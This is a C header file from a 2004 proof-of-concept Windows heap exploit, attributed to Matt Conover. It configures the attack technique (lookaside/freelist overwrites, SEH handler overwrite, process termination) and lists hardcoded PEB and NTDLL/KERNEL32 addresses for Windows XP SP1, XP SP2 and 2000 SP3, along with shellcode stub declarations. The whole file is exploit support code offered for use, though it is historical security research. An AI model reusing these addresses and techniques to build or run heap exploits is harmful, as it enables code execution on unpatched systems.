// Proof-of-concept code heap exploit code
// Written by Matt Conover in December 2004
#ifndef SHELLCODE_H
#define SHELLCODE_H

#define USE_LOOKASIDE 1
//#define USE_FREELIST 1
//#define USE_SEGMENT_OVERWRITE 1
//#define USE_CACHE_OVERWRITE 1
//#define USE_DISPATCH_OVERWRITE 1

//#define USE_C_SHELLCODE 1
//#define USE_THREAD_TERMINATE 1 // if this is not defined, the shellcode goes into a loop instead
#define USE_PROCESS_TERMINATE 1
#define USE_SEH_HANDLER 1 // overwrites the exception handler

#define PEB_CRITICAL_SECTION 0x7ffdf01c
#define PEB_LOCK_ROUTINE 0x7ffdf020
#define PEB_UNLOCK_ROUTINE 0x7ffdf024
#define PEB_SPACE        0x7ffdf154
#define PEB_HEAP_COUNT   0x7ffdf088
#define PEB_DEFAULT_HEAP 0x7ffdf018
#define PEB_HEAP_HANDLES 0x7ffdf090
#define GET_CURRENT_THREAD() ((HANDLE)0xFFFFFFFE)
#define GET_CURRENT_PROCESS() ((HANDLE)0xFFFFFFFF)

/////////////////////////////////////////////////////////////////
// Depends on version of NTDLL and KERNEL32

// NOTE: YOU MUST CHANGE THE FOLLOWING HARDCODED ADDRESSES TO WHATEVER THEY ARE ON YOUR SYSTEM
// NOTE: YOU MUST CHANGE THE FOLLOWING HARDCODED ADDRESSES TO WHATEVER THEY ARE ON YOUR SYSTEM
// NOTE: YOU MUST CHANGE THE FOLLOWING HARDCODED ADDRESSES TO WHATEVER THEY ARE ON YOUR SYSTEM

// Windows XP SP2
//#define RTL_ENTER_CRITICAL_SECTION 0x7C901005
//#define RTL_LEAVE_CRITICAL_SECTION 0x7C9010ED
//#define ZW_TERMINATE_THREAD 0x7C90E8A3
//#define ZW_TERMINATE_PROCESS 0x7C90E88E
//#define SLEEP 0x7C802442
//#define SEH 0x7C8833AC // NOTE on XPSP2: this must be overwritten with a pointer returned from RtlEncodePointer()

// Windows XP SP1
#define RTL_ENTER_CRITICAL_SECTION 0x77f5b2a0 
#define RTL_LEAVE_CRITICAL_SECTION 0x77f5b380
#define ZW_TERMINATE_THREAD 0x77f5c458
#define ZW_TERMINATE_PROCESS 0x77f5c448
#define SLEEP 0x77e61bea
#define SEH 0x77ee044c

// Windows 2000 SP3
//#define RTL_ENTER_CRITICAL_SECTION 0x77f8313c
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f8316d
//#define ZW_TERMINATE_THREAD 0x77f852cd
//#define ZW_TERMINATE_PROCESS 0x77f896c3
//#define SLEEP 0x77ea9d54
//#define SEH 0x77ea1678

#define X86_JMP_4BYTES 0xe9
#define MAX_STUB_SIZE 1024
#define END_SIGNATURE_PART1 0xab
#define END_SIGNATURE_PART2 0xcd
#define END_SIGNATURE_PART3 0xef

#define END_FUNCTION \
	_asm _emit END_SIGNATURE_PART1 \
	_asm _emit END_SIGNATURE_PART2 \
	_asm _emit END_SIGNATURE_PART3

BYTE *GetFunctionAddress(BYTE *Function);
DWORD GetStubLength(BYTE *Stub);
void c_shellcode_stub();
void shellcode_stub();
 
#endif // SHELLCODE_H